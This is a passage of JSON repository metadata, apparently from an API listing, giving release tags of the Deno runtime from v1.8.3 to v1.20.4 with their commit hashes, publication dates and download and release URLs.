2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/